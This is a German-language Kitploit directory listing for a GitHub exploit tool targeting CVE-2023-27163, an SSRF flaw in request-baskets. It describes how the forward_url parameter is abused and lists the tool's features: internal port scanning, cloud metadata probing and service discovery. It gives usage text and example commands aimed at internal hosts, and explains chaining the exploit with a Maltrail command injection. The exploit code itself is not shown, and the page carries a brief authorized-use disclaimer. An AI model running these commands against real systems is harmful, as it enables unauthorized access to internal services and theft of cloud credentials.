Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-27163-exploit | Kitploit
Tools/GitHubGitHub/jeanback1/cve-2023-27163-exploit
AufklärungPort-ScanningSchwachstellenanalyseExploitationWebanwendungs-ExploitationCloud-Sicherheit
GitHubjeanback1/cve-2023-27163-exploit

CVE-2023-27163-exploit

Repository anzeigen
vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-27163 — request-baskets SSRF Exploit

Ich habe diesen Exploit geschrieben, um CVE-2023-27163 anzugreifen, eine Server-Side Request Forgery (SSRF) Sicherheitslücke, die in request-baskets Versionen ≤ 1.2.1 vorkommt. Der Fehler liegt im Endpunkt /api/baskets/{name}, wo der Parameter forward_url es einem Angreifer ermöglicht, den Server dazu zu bringen, in seinem Namen beliebige HTTP-Anfragen zu stellen.

So funktioniert es

Der Exploit erstellt einen bösartigen "Basket", der mit einer forward_url konfiguriert ist, die auf ein internes Ziel zeigt. Jede Anfrage an den Endpunkt dieses Baskets wird vom Server an die angegebene URL weitergeleitet, wodurch der Server effektiv zu einem SSRF-Proxy wird.

Funktionen

  • SSRF-Anfrageweiterleitung an beliebige interne oder externe URLs
  • Portscan interner Hosts per HTTP-Probe
  • Abfrage von Cloud-Metadata-Endpunkten (AWS, GCP, Azure, DigitalOcean, Alibaba)
  • Erkennung häufiger interner Dienste
  • Konfigurierbare Basket-Profile (Proxy, unsicheres TLS, Pfaderweiterung)

Voraussetzungen

  • Python 3.6+
  • requests-Bibliothek (pip install requests)

Verwendung

root@kitploit:~
usage: exploit.py [-h] -t TARGET [-f FORWARD_URL] [--proxy-response]
                  [--insecure-tls] [--no-expand-path] [--capacity CAPACITY]
                  [--scan-host SCAN_HOST] [--ports PORTS] [--scan]
                  [--discover] [--cloud-metadata] [--timeout TIMEOUT]
                  [--delay DELAY]

Beispiele

root@kitploit:~
# Basic SSRF forward to an internal service
python3 exploit.py -t http://192.168.1.100:55555 -f http://127.0.0.1:80/admin

# Port scan an internal host
python3 exploit.py -t http://192.168.1.100:55555 --scan-host 127.0.0.1 --scan

# Probe cloud metadata endpoints
python3 exploit.py -t http://192.168.1.100:55555 --cloud-metadata

# Proxy mode (returns the forwarded response body)
python3 exploit.py -t http://192.168.1.100:55555 -f http://127.0.0.1:80 --proxy-response

# Custom port range scan
python3 exploit.py -t http://192.168.1.100:55555 --scan-host 10.0.0.2 \
         --ports 80,443,3000,5000,8000,8080,9000

Haftungsausschluss

Ich habe dieses Tool nur für Bildungszwecke und autorisierte Sicherheitstests erstellt. Verwenden Sie es nicht gegen Systeme ohne ausdrückliche Genehmigung.


Verkettung mit

Dieser SSRF-Exploit kann als erster Einstiegspunkt verwendet werden, um interne Dienste zu erreichen, die nicht direkt exponiert sind. Ich habe ihn entwickelt, um mit dem Maltrail-v0.53-Exploit zusammenzuarbeiten — der SSRF-Tunnel ermöglicht es, eine auf localhost laufende Maltrail-Instanz anzusteuern und dadurch die Befehlsinjektion auszulösen.# CVE-2023-27163-exploit

Tool herunterladen